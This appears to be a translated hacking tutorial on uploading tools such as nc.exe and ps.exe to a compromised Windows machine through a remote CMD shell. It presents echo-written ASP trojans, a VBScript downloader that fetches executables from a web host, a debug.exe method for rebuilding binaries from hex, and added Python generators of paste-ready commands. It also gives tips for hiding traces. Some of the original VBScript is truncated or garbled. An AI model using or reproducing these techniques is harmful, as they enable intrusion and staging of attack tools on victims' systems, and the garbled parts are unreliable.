For a CMD shell obtained through an overflow exploit, the biggest problem is how to upload files. Because of the prevalence of worms, ports 139 and 445, which an IPC$ connection needs, are usually blocked. In addition, Windows XP strengthens the protection of IPC$, so uploading through IPC$ and the default shares is basically no longer viable. FTP and TFTP are two workable methods; since they are well known, they are not covered here. There are also three methods you may already be familiar with. To sum up, I would like to go over them again.
1. Write an ASP trojan with the echo command.
The premise, of course, is that IIS is already installed on the target host.
A typical ASP trojan is too large to write with the echo command, so here is a compact one, given directly in its echo form:
@echo ^ >up.asp
Note that it is a single line with no line break in the middle.
The generated up.asp cannot be accessed from a browser; it can only be used with the following script:
@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"+w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs
For example, to download ps.exe and save it as C:\path\ps.exe:
cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
Note that this is run in the remote shell.
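Both echo-based methods above come down to one thing: making cmd.exe write a text file line by line without the shell interpreting the content. The Python below is an added example, not part of the original article; it runs on the attacker's own machine to prepare the lines that are pasted into the remote shell. It escapes each line for echo (tracking the quoted state the same way cmd does, since a ^ inside double quotes is printed rather than treated as an escape), places the redirection before echo so that a line ending in a digit is not read as a handle redirection, handles empty lines, and checks the result against a small model of cmd's own parsing. The sample input is a constructed VBScript downloader written in the style of dl.vbs for this example; it is not claimed to be the article's exact script. The example assumes an interactive cmd prompt rather than a .bat file, so percent signs are left untouched.

```python
CMD_OPERATORS = set('^&|<>')
# `echo on`, `echo off` and `echo /?` change echo state or print help instead of text
CMD_ECHO_OPTIONS = {'on', 'off', '/?'}


def escape_cmd_echo(line: str) -> str:
    """Escape one line so that `echo <result>` prints the line verbatim.

    cmd.exe toggles a quoted state on every double quote. Outside quotes the
    characters ^ & | < > are operators and must be prefixed with ^ (the page's
    own `^>`); inside quotes they are literal and an added ^ would be printed,
    so nothing is escaped there. % is left alone: at an interactive prompt an
    undefined %name% is kept as-is (in a .bat file it would need doubling).
    """
    if line.strip().lower() in CMD_ECHO_OPTIONS:
        raise ValueError(f"line {line!r} would be taken as an echo option, not text")
    out = []
    in_quotes = False
    for ch in line:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in CMD_OPERATORS and not in_quotes:
            out.append('^')
        out.append(ch)
    return ''.join(out)


def echo_commands(text: str, target: str) -> list:
    """Return the cmd.exe lines that recreate `text` as the file `target`.

    The redirection is placed before `echo`: `echo ...0>>f` would be parsed as
    `0>>f` (a handle-0 redirection) and lose the digit, and `echo x >>f` would
    write a trailing space. `>f echo x` has neither problem. A bare `echo`
    prints "ECHO is on.", so empty lines are written with `echo.`.
    """
    cmds = []
    for i, line in enumerate(text.splitlines()):
        redirect = ('>' if i == 0 else '>>') + target   # first line creates/truncates the file
        if line == '':
            cmds.append(f'{redirect} echo.')
        else:
            cmds.append(f'{redirect} echo {escape_cmd_echo(line)}')
    return cmds


def simulate_cmd_echo(cmd: str) -> str:
    """Model what cmd.exe writes for one generated line: strip the redirection
    and the command word, drop ^ outside quotes and keep the next character.
    This is only an offline check of the escaping, not cmd.exe itself."""
    _redirect, _sep, rest = cmd.partition(' echo')
    if rest == '.':
        return ''
    body = rest[1:]            # skip the single space after `echo`
    out, in_quotes, i = [], False, 0
    while i < len(body):
        ch = body[i]
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == '^' and not in_quotes:
            i += 1
            ch = body[i]       # escaped character is taken literally
        out.append(ch)
        i += 1
    return ''.join(out)


# Constructed sample: a downloader in the style of the page's dl.vbs (an
# assumption for this example, not the article's own lines). It contains
# the cases that matter: < and > outside quotes, & and ^ inside quotes,
# an empty line and a line ending in a digit.
SAMPLE_VBS = '\n'.join([
    'with wscript:if .arguments.count<2 then .quit',
    'set w=.createobject("microsoft.xmlhttp")',
    'set aso=createobject("adodb.stream")',
    '',
    "' note: \"a&b^c\" & retries>1",
    'w.open "get",.arguments(0),0:w.send:if w.status>200 then .echo "Error:"+w.status:.quit',
    'aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with',
])

if __name__ == '__main__':
    for c in echo_commands(SAMPLE_VBS, 'dl.vbs'):
        print(c)
```

Paste the printed lines into the remote shell one at a time (or with whatever line endings that shell needs), then run the script with cscript as above.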
4. Echo an encoded copy of any file and restore it with a script plus debug.exe.
Neither of the previous two methods is guaranteed to get through a firewall. Besides, unless you set up your own web server, web resources are generally offered as compressed archives, and if the target host has no decompression tool there is nothing you can do. This method, then, is the "trump card".
The echo command can write characters whose ASCII code is below 128, but not bytes with a value of 128 or above. Only after the local file is re-encoded into displayable characters can it be written to the remote host conveniently. The first thing that comes to mind is Base64, the encoding used for email attachments. However, VBS has no bitwise operators, so encoding and decoding are more complicated. What is more, a script's ability to handle a file as a binary stream is poor (ADODB.Stream can write files in binary mode, but I can't construct the corresponding data type; a binary stream can be converted to a string with the MidB function, but not the other way round. It took me two days to solve the problem. If anyone can write arbitrary byte values to a file with VBS or JS, please let me know.)
That leaves only debug.exe. Many people know the principle, so I will not explain it and will give the result directly, the encoding script:
sll=sl mod 65536:slh=sl\65536
.write "@echo str="""
for i=1 to sl
if bt>debug.vbs"+vbcrlf+"@echo +"""
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
Save it as echo.vbs. Suppose you want to upload nc.exe; enter the following on the local command line:
cscript echo.vbs nc.exe
You can also drag the icon of the file to be transferred onto the icon of the script file.
After a moment, nc.exe.bat is generated in the current directory. Open it with Notepad or another editor and you will see something like this:
... (lines omitted)
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs
Select all -> Copy -> switch to the remote command-line window -> Paste.
If the network is not very slow, the whole upload takes about 20 seconds.
1. Transferring large files is unstable and may kill the shell, so the smaller the file the better. It is suggested that the original file not exceed 100 KB.
2. Before transferring a large file, transfer a small one first as a "warm-up", so that the 16-bit virtual machine ntvdm.exe stays resident in the background. After all files have been transferred, kill the ntvdm process for the sake of concealment.
3. In some CMD shells each command needs two carriage returns appended, so nc.exe.bat cannot be used directly.
4. The length of a single command is limited, so the whole job cannot be done with one echo. Moreover, in the CMD shell provided by nc, a slightly longer command makes the shell exit on its own (overflow?). You can change the "i mod 128 = 0" statement to adjust the length of each echo command; each echo then carries twice that many characters, since every byte is encoded as two hex digits.
5. Decoding works without the script as well. The purpose of using the script is to reduce the amount of data transferred (because the data is compressed). If I have time, I will write a better script with stronger compression and a data verification function.
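The encoding step of this method, rewritten in Python as an added example (it is not the article's echo.vbs, which is VBScript): it turns a binary into a debug.exe script of the same shape the page's debug.vbs emits (`e` lines of 24 bytes starting at offset 0100, then rbx, rcx, n, w and q), verifies it with a small offline model of those debug commands, and wraps the script in cmd echo lines for pasting. Assumptions beyond the article: the script is fed to debug.exe with `debug<debug.txt` instead of being piped from cscript, the temporary file name debug.txt and the chunk size are my own choices, and the example refuses files that do not fit below offset FFFF of debug's default segment (65280 bytes), which is more conservative than the 100 KB suggested in note 1; larger files would need segment-qualified addresses and are not handled here. One caveat for today: debug.exe runs under NTVDM and therefore exists only on 32-bit Windows; there is no 64-bit version.

```python
LOAD_OFFSET = 0x100                 # debug.exe enters and writes data from CS:0100
MAX_BYTES = 0x10000 - LOAD_OFFSET   # keep every `e` address inside the default segment


def debug_script(data: bytes, out_name: str, bytes_per_line: int = 24) -> str:
    """Build a debug.exe script that recreates `data` as the file `out_name`.

    `e ADDR b1 b2 ...` enters bytes at an offset, `rcx`/`rbx` set the low/high
    16 bits of the write length (debug reads the new value from the next line),
    `n` names the file, `w` writes BX:CX bytes starting at CS:0100, `q` quits.
    """
    if not 0 < len(data) <= MAX_BYTES:
        raise ValueError(f"file must be 1..{MAX_BYTES} bytes for a single segment")
    if bytes_per_line < 1:
        raise ValueError("bytes_per_line must be positive")
    lines = [f"n {out_name}"]
    for off in range(0, len(data), bytes_per_line):
        chunk = data[off:off + bytes_per_line]
        hexbytes = " ".join(f"{b:02X}" for b in chunk)
        lines.append(f"e {LOAD_OFFSET + off:04X} {hexbytes}")
    size = len(data)
    lines += ["rcx", f"{size & 0xFFFF:X}", "rbx", f"{size >> 16:X}", "w", "q"]
    return "\n".join(lines) + "\n"


def simulate_debug(script: str):
    """Offline model of the few debug.exe commands used above (not debug.exe).
    Returns (file name, bytes that `w` would write) so the script can be
    checked before it is pasted anywhere."""
    mem = bytearray(0x10000)
    regs = {"rcx": 0, "rbx": 0}
    name, written = None, None
    it = iter(script.splitlines())
    for cmd in it:
        if cmd.startswith("n "):
            name = cmd[2:]
        elif cmd.startswith("e "):
            addr, *hexbytes = cmd[2:].split()
            start = int(addr, 16)
            mem[start:start + len(hexbytes)] = bytes(int(h, 16) for h in hexbytes)
        elif cmd in regs:
            regs[cmd] = int(next(it), 16)   # the register value follows on its own line
        elif cmd == "w":
            length = (regs["rbx"] << 16) | regs["rcx"]
            written = bytes(mem[LOAD_OFFSET:LOAD_OFFSET + length])
        elif cmd == "q":
            break
    return name, written


def echo_commands(script: str, script_name: str = "debug.txt") -> list:
    """cmd.exe lines that recreate the script on the target, run debug.exe on
    it and delete it. The redirection goes before `echo` because most script
    lines end in a hex digit, and `echo ... 00>>f` would be parsed as a
    handle-0 redirection. The script contains none of ^ & | < >, so no
    escaping is needed; the per-line length is bounded by bytes_per_line."""
    cmds = []
    for i, line in enumerate(script.splitlines()):
        cmds.append(f"{'>' if i == 0 else '>>'}{script_name} echo {line}")
    cmds.append(f"debug<{script_name}>nul&&del {script_name}")
    return cmds


if __name__ == "__main__":
    import sys
    # usage: python debug_encode.py nc.exe > nc.exe.txt, then paste nc.exe.txt
    with open(sys.argv[1], "rb") as f:
        payload = f.read()
    for c in echo_commands(debug_script(payload, sys.argv[1])):
        print(c)
```

Run it locally on the file to upload and paste the printed lines into the remote shell; lower bytes_per_line if the shell dies on long commands, as note 4 describes for the original script.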
Uploading files this way is easy enough, but many Windows tools are more convenient. As you go around looking for the tools you need, don't forget Windows itself.